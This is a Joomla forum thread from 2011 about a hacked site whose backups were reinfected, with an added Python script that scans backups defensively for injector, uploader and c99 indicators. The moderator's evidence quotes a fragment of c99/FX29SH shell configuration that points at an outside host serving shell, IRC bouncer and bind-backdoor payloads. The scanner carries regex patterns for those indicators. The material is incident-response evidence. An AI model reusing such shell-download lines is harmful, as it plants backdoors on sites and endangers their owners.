The Joomla! Forum ™
PostPosted: Sat Jun 04, 2011 3:18 pm 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2694
Location: Wisconsin USA
@webdongle etc..

"You also need to remove every file, cron job, sub domains, directories, etc. from your domain."
"mmmmmmmm, me thought that was done in the first place"

Site was restored from site backups which are infected.

I've downloaded the backups I have from cPanel, unzipped them and scanned them with Norton anti-virus (I'm on a Mac). I did the same with the public_HTML folder. The backups had trojans,

Take a closer look at some of the posts. While it is possible that the server has another account hacked, it is likely originating from this account. There are several scripts here

an injector script and an uploader script:

{HEX}base64.inject.unclassed.3 : ./media/system/cfg.php
{HEX}php.uploader.max.523 : ./media/system/upload.php

Evidence the hacker messed with or has attempted to mess with the database:

hableda1_jo151.jos_session
warning : Table is marked as crashed
warning : 1 client is using or hasn't closed the table properly
warning : Found 1128996 deleted space in delete link chain. Should be 1167464
error : Found 442 deleted rows in delete link chain. Should be 457

hableda1_jo151.jos_content
warning : 1 client is using or hasn't closed the table properly
status : OK
error : record delete-link-chain corrupted
error : Corrupt

Evidence that hacker has installed or linked to c99, and other scripts:

#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."c99_update.php";
$fx29sh_sourcesurl = $sh_mainurl."c99.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"),
"psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),

Evidence of IRC installed and active:

A few updates: I've downloaded and scanned my backup that was just generated and this virus was found in the homedir.tar and the hableda1.tar.gz (I scanned both the zipped and unzipped files): backdoor.IRC.bot.

Evidence the attempts to use the site for malware/spam/other purposes continue:

There is a lot of POST requests to the index page from the IP address xxx.xxx.xxx.xxx

These are the reasons I stated what I did as a plan of action.

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
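The evidence PhilD lists above (PHP dropped under media/system, a base64 injector, an uploader, the FX29SH/c99 configuration variables, and a burst of POSTs to the index page) can be checked for in a read-only way before deciding whether a backup is usable. The script below is an added example, not code from the forum thread or from Joomla: it walks an unpacked backup and reports those indicator types, and counts POST requests to the index page per client IP over access-log lines. The directory list, the regex patterns, the sample file tree and the log lines are all assumptions or constructed data, and the "malicious" sample files are inert marker strings, not working scripts.

```python
"""Added example, not from the forum thread or any Joomla project code:
read-only triage of an unpacked backup for the indicator types the post lists
(PHP under static-asset directories, base64/eval injectors, c99/FX29SH
configuration variables, uploaders) plus a POST-flood count over access-log
lines. Directory names, patterns and sample data are assumptions/constructed."""
import os
import re
import tempfile
from collections import Counter

# Joomla directories that should hold only static assets; a .php file under
# them is suspicious (assumption, modelled on cfg.php/upload.php in media/system).
STATIC_ONLY_DIRS = ("media/system/", "images/")

# Content indicators drawn from the thread's evidence (constructed patterns).
CONTENT_PATTERNS = {
    "base64_eval": re.compile(r"eval\s*\(\s*(base64_decode|gzinflate)\s*\(", re.I),
    "c99_variant": re.compile(r"\$(sh_mainurl|fx29sh_updateurl|fx29sh_sourcesurl)\b"),
    "file_upload": re.compile(r"move_uploaded_file\s*\(", re.I),
}

# Common Log Format: client IP, identd, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def scan_webroot(root):
    """Walk an unpacked backup; return sorted (relative_path, indicator) pairs.
    Nothing is modified or deleted: this is triage, not cleanup."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if name.lower().endswith(".php") and rel.startswith(STATIC_ONLY_DIRS):
                findings.append((rel, "php_in_static_dir"))
            try:
                with open(full, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for label, pattern in CONTENT_PATTERNS.items():
                if pattern.search(text):
                    findings.append((rel, label))
    return sorted(findings)


def post_flood_ips(log_lines, threshold=50):
    """Count POST requests to / or /index.php per client IP and return the
    IPs at or above the threshold (the 'lots of POSTs to the index page' case)."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort mid-triage
        ip, method, path, _status = m.groups()
        if method == "POST" and path.split("?", 1)[0] in ("/", "/index.php"):
            counts[ip] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def build_sample_tree():
    """Create a constructed mini web root in a temp dir and return its path.
    The 'malicious' files are inert marker strings, not working scripts."""
    root = tempfile.mkdtemp(prefix="joomla_triage_")
    files = {
        "index.php": "<?php define('_JEXEC', 1); // clean core entry point\n",
        "media/system/css/system.css": "body { margin: 0; }\n",
        "media/system/cfg.php": "<?php eval(base64_decode('UExBQ0VIT0xERVI=')); // marker only\n",
        "media/system/upload.php": "<?php if (0) { move_uploaded_file($a, $b); } // marker only\n",
        "templates/beez/backup.php": "<?php $sh_mainurl = 'http://localhost/FX29SH/'; // marker only\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


# Constructed access-log lines using documentation IP ranges (RFC 5737).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jun/2011:15:18:00 +0000] "POST /index.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [04/Jun/2011:15:18:01 +0000] "POST /index.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [04/Jun/2011:15:18:02 +0000] "POST / HTTP/1.1" 200 512',
    '198.51.100.4 - - [04/Jun/2011:15:18:03 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9001',
    '198.51.100.4 - - [04/Jun/2011:15:18:04 +0000] "POST /index.php?option=com_user HTTP/1.1" 303 0',
    'not a log line at all',
]

if __name__ == "__main__":
    root = build_sample_tree()
    for rel, label in scan_webroot(root):
        print(f"{label:18} {rel}")
    print(post_flood_ips(SAMPLE_LOG, threshold=3))
```

Run it against the unpacked backup rather than the live site, and treat a hit as a reason to inspect the file, not as proof on its own: the patterns are deliberately broad, and a clean scan of these few indicators does not make a backup trustworthy, which is why the thread's advice to rebuild from known-good sources still stands.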


PostPosted: Sat Jun 04, 2011 4:04 pm 
Joomla! Master

Joined: Mon Aug 29, 2005 10:17 am
Posts: 11987
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
PhilD wrote:
These are the reasons I stated what I did as a plan of action.
to which I agree completely and he should change host as well imho despite the host being very helpful. One cannot take the risk after all these events and the experience described to renew a Joomla site with the same host....No offense to the host as such but you simply cannot take the risk as habledash is expressing his own doubts!

@ habledash: No reason for me to take WP over Joomla...makes from a security point of view no difference....Bluehost I would investigate a little bit longer......Contact me via PMB to share some client experiences since I do not wish to get PhilD all over me with "wall of hosting shame" (Sorry Phil..could not resist a little joke.......don't take all too serious.....)

Leo 8)

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---


PostPosted: Sat Jun 04, 2011 5:48 pm 
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
Webdongle wrote:
.....

Also some Hosting companies are well known for being hacked on a regular basis
Try a google search for
yourhost hacked

Here are the results
http://www.google.co.uk/search?q=Blueho ... e=off&tbs=

_________________
http://weblinksonline.co.uk/joomla-faq.html


PostPosted: Sat Jun 04, 2011 5:56 pm 
Joomla! Master

Joined: Mon Aug 29, 2005 10:17 am
Posts: 11987
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
@ Webdongle
With all respect to your intentions and the facts please stay on topic....Your contribution adds to a "wall of shame" which does not belong in this thread.....

If you like to open a thread about experiences with whatever host feel free and it will be welcomed since these issues are important......However placing them in this thread is beyond topic imho

I restrained as you can see from my post...no need at all to do links to that particular host in the thread (!)

Leo 8)

_________________
--- Joomla Professional Support Services :: http://gws-desk.com ---
--- Joomla Professional and Specialized Hosting :: http://gws-host.com ---
--- Ready to Roll Joomla! Web Sites : 1 - 7 days only! :: @ gws-market.com ---


PostPosted: Sat Jun 04, 2011 6:39 pm 
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 23363
Location: @Webdongle
leolam wrote:
....
With all respect to your intentions and the facts please stay on topic....Your contribution adds to a "wall of shame" which does not belong in this thread.....
....

IMHO it is on topic and is not a 'Hall of shame'; it is part of a diagnostic process. "Once you eliminate the impossible, whatever remains, no matter how improbable, must be the truth." Sir Arthur Conan Doyle.

The OP has eliminated everything else; a search on his Host with the word 'Hacked' is that which remained. The search linked to was the next step in the process of elimination. Pasting the link does not name and shame because it makes no conclusion about the Host. It merely shows a link to the results of such a search. Therefore it is part of the analytical process and not a hall of shame. And as such is very relevant to the thread.

_________________
http://weblinksonline.co.uk/joomla-faq.html


PostPosted: Sat Jun 04, 2011 9:16 pm 
Joomla! Explorer

Joined: Thu Jan 31, 2008 8:45 am
Posts: 404
I think Webdongle was right to post the above link. It definitely is relevant with regard to the OP making a decision to change hosts or not.
It looks pretty conclusive in my opinion what the next step should be.

_________________
http://www.netmagnetics.com


PostPosted: Sun Jun 12, 2011 12:35 pm 
Joomla! Hero

Joined: Sat Oct 21, 2006 10:20 pm
Posts: 2694
Location: Wisconsin USA
The OP had active on the domain a c99 script variant, an uploader script and an eggdrop script. The site had backups, both by the host and by the individual. However, these backups were all infected with the above scripts. The site has been cleaned, a much better host (mod_security etc.) has been selected to host the site, and the site is being monitored.

The database errors and other database issues were due to an excessively large sessions table. This has also been taken care of.

Edit: The host also was not BlueHost

_________________
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

